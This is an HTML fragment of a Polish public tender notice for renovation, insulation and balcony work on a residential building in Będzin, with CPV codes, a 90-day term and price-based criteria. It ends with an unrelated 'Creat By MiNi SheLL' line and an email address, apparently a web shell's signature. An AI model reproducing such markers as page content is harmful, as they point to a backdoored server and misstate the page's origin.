<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.21.00-2, 45.42.10.00-4, 45.42.10.00-5, 45.44.30.00-4, 45.45.30.00-7, 45.11.13.00-1, 45.26.19.10-6, 45.23.32.00-1, 45.11.12.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności faktury - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3: Renowacja ściany południowej, renowacja i przebudowa ściany zachodniej, ocieplenie i przebudowa pozostałych ścian zewnętrznych, remont balkonu i podestów oraz wymiana części stolarki zewnętrznej.
Lokalizacja: budynek mieszkalny przy ul. Czeladzkiej 10 w Będzinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> roboty przygotowawcze, polegające min. na odbiciu tynku, naprawieniu uszkodzonych w murze cegieł i powierzchni murów, przemurowaniu ciągłym pęknięć, uzupełnieniu tynku, wymianie obróbek blacharskich, rynien i rur spustowych; przygotowanie podłoża, gruntowanie, wykonanie warstwy zbrojonej z siatki, wykonanie wyprawy elewacyjnej z tynku silikonowego (elewacja południowa i zachodnia); przygotowanie podłoża, gruntowanie, ocieplenie styropianem grub. 12cm z wykonaniem wyprawy elewacyjnej z tynku silikonowego (elewacja północna, wschodnia, ściany atrium); częściowa wymiana stolarki okiennej na stolarkę PCV i stolarki drzwiowej na  stalową; wymiana balkonu na balkon systemowy, stalowy,  podwieszany - podest z płyty kompozytowej, barierka stalowa wys. min. 1,10m malowana proszkowo, oraz podestu w atrium  na podest z płyty kompozytowej z barierką j.w.;
cieplenie  ścian fundamentowych na głębokość 2,0m, styropianem FUNDAMENT grub. 12cm z izolacją folią kubełkową, wykonanie opaski z białego żwiru (elewacja wschodnia i częściowo południowa); wywóz i utylizacja gruzu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.21.00-2, 45.42.10.00-4, 45.42.10.00-5, 45.44.30.00-4, 45.45.30.00-7, 45.11.13.00-1, 45.23.32.00-1, 45.11.12.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności faktury - 1</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com